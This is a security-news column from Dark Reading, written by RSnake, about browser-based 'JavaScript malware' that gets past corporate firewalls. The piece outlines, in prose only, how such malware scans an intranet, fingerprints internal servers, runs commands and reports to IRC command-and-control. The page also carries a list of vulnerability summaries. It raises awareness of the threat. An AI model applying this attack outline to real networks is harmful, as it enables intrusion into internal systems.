Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.


06:00 AM

JavaScript Malware Strikes Firewalls

It's a security hole no one knows how to fix, except by degrading Web browsing to little more than a text-based experience

2:00 PM -- In the beginning, there was application security.

All ports were open to the world and practically every application had holes in it. It was like the Wild West. Eventually application security became a big deal as more serious issues were uncovered and more commerce depended upon secure platforms.

Network security was next on the scene. It made sense to build a single choke point for all security needs. It was slick because it could see all the packets in transit to and from your servers, and turn off all access to anything that had a known hole in it. Those were the good times. Times have since changed.

Network security, in large part, had a huge role to play in creating the newest attacks. Network administrators rightly told their architects to build applications that could be tunneled over hypertext transfer protocol, while at the same time they would close down all access to any other unnecessary inbound services. Can you see the obvious flaw in their logic here?

Even still, aside from the occasional hole in IMAP or BIND, the world of computer security seemed to be calming down quite a bit with the advent of stateful packet inspection and security information management tools. Most of the holes at that time were against the security tools themselves, which most of the hardcore security folks felt was scraping the bottom of the barrel -- the last bunch of entry points to a secured network.

Now there is a new emerging threat: JavaScript malware. Coined by Jeremiah Grossman of WhiteHat Security, JavaScript malware is a concept we have been working on for nearly a year that defeats firewalls completely. To be frank, it's the one security hole no one has figured out how to fix yet without degrading your browsing experience back into the text-based dark ages.

Traditionally every firewall allows one thing by default: outbound access to any Web server on earth. That Web server can either be under the attacker's control or have a cross-site scripting vulnerability in it. When a user inside a corporate LAN visits the malicious Web page, that Web page starts making requests to internal devices behind your firewall.

The first thing the malware does is attempt to locate any machine that responds. Once it does that it attempts to fingerprint things on the machine that might tell the attacker more (like what Web server itself it is running, which might have default issues with it or a particular outdated version of an open sourced package with remote file includes built into it). Using that as a steppingstone, the malware attempts to execute the command on the user on your corporate intranet's behalf. If the attack is successful the machine behind the firewall is compromised.

It has a higher chance of being successful than on the Internet because rarely do corporations patch up internal machines. I mean, why would a company bother to secure its intranet portal? It's just an intranet server and not Web-accessible, right? That's true in principle, but very wrong in practice.

As a side note, most companies almost always alias to http://intranet/YourCompanyNameHere, making the attacker's job extremely easy. This even shortcuts having to scan IP ranges, since it's an easy single name to guess.

After scanning a corporate intranet, the next step is to execute commands on the machines the malware does find for the eventual purpose of gaining access to internal machines. Those internal machines will most likely run a series of commands to gain higher and more permanent access to the machine that was compromised which then could communicate back to a command-and-control node over IRC chat in the same way all botnets do.

The corporate firewall is helpless to protect against this sort of attack. Researchers like myself and others are looking into clever ways to fix the issue, but for now, the only fix is to isolate users from all machines on the corporate LAN. Hopefully there will be much more on this to follow. In the meantime, a text-based world isn't looking so bad after all, huh?

— RSnake is a red-blooded lumberjack whose rants can also be found at Ha.ckers and F*the.net. Special to Dark Reading

  • WhiteHat Security

    Comment  | 
    Print  | 
    More Insights
  • Comments
    Newest First  |  Oldest First  |  Threaded View
    Firms Improve Threat Detection but Face Increasingly Disruptive Attacks
    Robert Lemos, Contributing Writer,  2/20/2020
    Ransomware Damage Hit $11.5B in 2019
    Dark Reading Staff 2/20/2020
    Register for Dark Reading Newsletters
    White Papers
    Current Issue
    6 Emerging Cyber Threats That Enterprises Face in 2020
    This Tech Digest gives an in-depth look at six emerging cyber threats that enterprises could face in 2020. Download your copy today!
    Flash Poll
    How Enterprises Are Developing and Maintaining Secure Applications
    How Enterprises Are Developing and Maintaining Secure Applications
    The concept of application security is well known, but application security testing and remediation processes remain unbalanced. Most organizations are confident in their approach to AppSec, although others seem to have no approach at all. Read this report to find out more.
    Twitter Feed
    Dark Reading - Bug Report
    Bug Report
    Enterprise Vulnerabilities
    From DHS/US-CERT's National Vulnerability Database
    PUBLISHED: 2020-02-26
    Moxa ioLogik 2542-HSPA Series Controllers and IOs, and IOxpress Configuration Utility ioLogik 2500 series firmware, Version 3.0 or lower IOxpress configuration utility, Version 2.3.0 or lower. Sensitive information is stored in configuration files without encryption, which may allow an attacker to a...
    PUBLISHED: 2020-02-26
    NetApp FAS 8300/8700 and AFF A400 Baseboard Management Controller (BMC) firmware versions 13.x prior to 13.1P1 were shipped with a default account enabled that could allow unauthorized arbitrary command execution via local access.
    PUBLISHED: 2020-02-26
    OnCommand Cloud Manager versions prior to 3.8.0 are susceptible to arbitrary code execution by remote attackers.
    PUBLISHED: 2020-02-26
    A vulnerability in the CLI of Cisco FXOS Software could allow an authenticated, local attacker to execute arbitrary commands on the underlying Linux operating system with a privilege level of root on an affected device. The vulnerability is due to insufficient validation of arguments passed to a spe...
    PUBLISHED: 2020-02-26
    A vulnerability in the NX-API feature of Cisco NX-OS Software could allow an unauthenticated, remote attacker to cause an NX-API system process to unexpectedly restart. The vulnerability is due to incorrect validation of the HTTP header of a request that is sent to the NX-API. An attacker could expl...